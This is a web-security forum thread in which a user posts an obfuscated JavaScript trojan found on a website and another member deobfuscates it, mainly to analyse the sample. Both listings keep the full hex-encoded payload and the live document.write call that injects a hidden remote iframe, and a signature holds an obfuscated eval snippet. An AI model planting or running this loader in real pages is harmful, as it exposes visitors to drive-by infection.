
SLA.CKERS.ORG
HA.CKERS SLACKING
sla.ckers.org web application security lab forums
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
javascript trojan unrevealed
Posted by: merica (IP Logged)
Date: May 08, 2009 03:34AM

I stumbled upon a website, and while the page was loading my antivirus found a trojan. I somehow managed to view the page contents and came across this script. I tried to understand how it works, but the messy function and variable names got my head spinning, so here it is; maybe someone here can tell what this is all about.

<script>
/*
 * Obfuscated sample as posted; the code below is left byte-for-byte.
 * - c268fb268di4a006283449b4(x) is parseInt(x, 16).
 * - i4a006283458f6(s) walks s two characters at a time, passes each pair
 *   through that helper and String.fromCharCode, and returns the joined text.
 * - r28 is the empty string, so every '+r28+' only fragments the hex literal;
 *   the concatenation is one continuous run of hex digits.
 * - The closing document.write() inserts the decoded text into the page as
 *   markup. That is the step that makes the page act on the payload, so the
 *   literal should be decoded offline and read as text, not evaluated in a browser.
 */
function c268fb268di4a006283449b4(i4a00628344d43){ return (parseInt(i4a00628344d43,16));}function i4a006283458f6(i4a00628345ce2){ var i4a006283460ac='';i4a0062834704f=String.fromCharCode;for(i4a006283464ab=0;i4a006283464ab<i4a00628345ce2.length;i4a006283464ab+=2){ i4a006283460ac+=(i4a0062834704f(c268fb268di4a006283449b4(i4a00628345ce2.substr(i4a006283464ab,2))));}return i4a006283460ac;} var r28='';var i4a0062834744f='3C7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E696628216D7'+r28+'96961297'+r28+'B646F637'+r28+'56D656E7'+r28+'42E7'+r28+'7'+r28+'7'+r28+'2697'+r28+'465287'+r28+'56E657'+r28+'363617'+r28+'065282027'+r28+'2533632536392536362537'+r28+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+r28+'332537'+r28+'32253633253364253237'+r28+'2536382537'+r28+'342537'+r28+'342537'+r28+'302533612532662532662536312536652537'+r28+'342536392537'+r28+'362536392537'+r28+'322537'+r28+'352537'+r28+'332532652537'+r28+'36253633253266253366253237'+r28+'2532622534642536312537'+r28+'342536382532652537'+r28+'322536662537'+r28+'352536652536342532382534642536312537'+r28+'342536382532652537'+r28+'32253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237'+r28+'253339253339253335253237'+r28+'2532302537'+r28+'37'+r28+'2536392536342537'+r28+'34253638253364253333253337'+r28+'253336253230253638253635253639253637'+r28+'2536382537'+r28+'342533642533312533362533382532302537'+r28+'332537'+r28+'342537'+r28+'39253663253635253364253237'+r28+'2537'+r28+'362536392537'+r28+'332536392536322536392536632536392537'+r28+'342537'+r28+'39253361253638253639253634253634253635253665253237'+r28+'2533652533632532662536392536362537'+r28+'3225363125366425363525336527'+r28+'29293B7'+r28+'D7'+r28+'6617'+r28+'2206D7'+r28+'969613D7'+r28+'47'+r28+'27'+r28+'5653B3C2F7'+r28+'3637'+r28+'2697'+r28+'07'+r28+'43E';document.write(i4a006283458f6(i4a0062834744f));</script>

Re: javascript trojan unrevealed
Posted by: Gareth Heyes (IP Logged)
Date: May 08, 2009 05:14AM

<script>
/**
 * Parse a string of hexadecimal digits into its numeric value.
 * Readable counterpart of the sample's `c268fb268di4a006283449b4` helper.
 *
 * @param {string} str - Hex digits, e.g. "3C".
 * @returns {number} The parsed integer, or NaN when no hex digits can be parsed.
 */
function fromHex(str) {
  const value = Number.parseInt(str, 16);
  return value;
}


/**
 * Decode a hex-encoded string: every two characters are read as one
 * hexadecimal character code and turned back into that character.
 * Readable counterpart of the sample's `i4a006283458f6` decoder.
 *
 * @param {string} payload - Hex text, two digits per output character.
 * @returns {string} The decoded text. Nothing is evaluated here; what happens
 *   to the result is up to the caller.
 */
function extractPayload(payload) {
  const chars = [];
  for (let offset = 0; offset < payload.length; offset += 2) {
    // Same two-character window the original took with substr(i, 2).
    const pair = payload.substring(offset, offset + 2);
    chars.push(String.fromCharCode(fromHex(pair)));
  }
  return chars.join("");
}

// r28 is an empty string. The sample splices it into the literal below only to
// break up the hex text, so the concatenation is one continuous hex string.
var r28 = "";
// Hex-encoded first stage. Decoded by extractPayload it is a <script> element
// that checks a global named `myia` and, when it is not yet set, calls
// document.write(unescape(...)) on a percent-encoded second stage, then sets
// myia = true. The second stage is an <iframe> styled visibility:hidden whose
// src is a remote URL with a Math.random()-derived number appended.
var payload = "3C7" + r28 + "3637" + r28 + "2697" + r28 + "07" + r28 + "43E696628216D7" + r28 + "96961297" + r28 + "B646F637" + r28 + "56D656E7" + r28 + "42E7" + r28 + "7" + r28 + "7" + r28 + "2697" + r28 + "465287" + r28 + "56E657" + r28 + "363617" + r28 + "065282027" + r28 + "2533632536392536362537" + r28 + "322536312536642536352532302536652536312536642536352533642536332533322533362532302537" + r28 + "332537" + r28 + "32253633253364253237" + r28 + "2536382537" + r28 + "342537" + r28 + "342537" + r28 + "302533612532662532662536312536652537" + r28 + "342536392537" + r28 + "362536392537" + r28 + "322537" + r28 + "352537" + r28 + "332532652537" + r28 + "36253633253266253366253237" + r28 + "2532622534642536312537" + r28 + "342536382532652537" + r28 + "322536662537" + r28 + "352536652536342532382534642536312537" + r28 + "342536382532652537" + r28 + "32253631253665253634253666253664253238253239253261253336253333253331253336253338253239253262253237" + r28 + "253339253339253335253237" + r28 + "2532302537" + r28 + "37" + r28 + "2536392536342537" + r28 + "34253638253364253333253337" + r28 + "253336253230253638253635253639253637" + r28 + "2536382537" + r28 + "342533642533312533362533382532302537" + r28 + "332537" + r28 + "342537" + r28 + "39253663253635253364253237" + r28 + "2537" + r28 + "362536392537" + r28 + "332536392536322536392536632536392537" + r28 + "342537" + r28 + "39253361253638253639253634253634253635253665253237" + r28 + "2533652533632532662536392536362537" + r28 + "3225363125366425363525336527" + r28 + "29293B7" + r28 + "D7" + r28 + "6617" + r28 + "2206D7" + r28 + "969613D7" + r28 + "47" + r28 + "27" + r28 + "5653B3C2F7" + r28 + "3637" + r28 + "2697" + r28 + "07" + r28 + "43E";
// NOTE(review): document.write inserts the decoded markup into the page, so
// opening this listing in a browser still runs the payload; the renaming above
// changes readability, not behaviour. To only read the decoded text, print the
// string instead (for example console.log(extractPayload(payload)) outside a browser).
document.write(extractPayload(payload));
</script>

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Re: javascript trojan unrevealed
Posted by: Gareth Heyes (IP Logged)
Date: May 08, 2009 05:33AM

And so the question is can Hackvertor decode it? :)

[www.businessinfo.co.uk]

and if you're super lazy:-
[www.businessinfo.co.uk]

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 05/08/2009 05:34AM by Gareth Heyes.


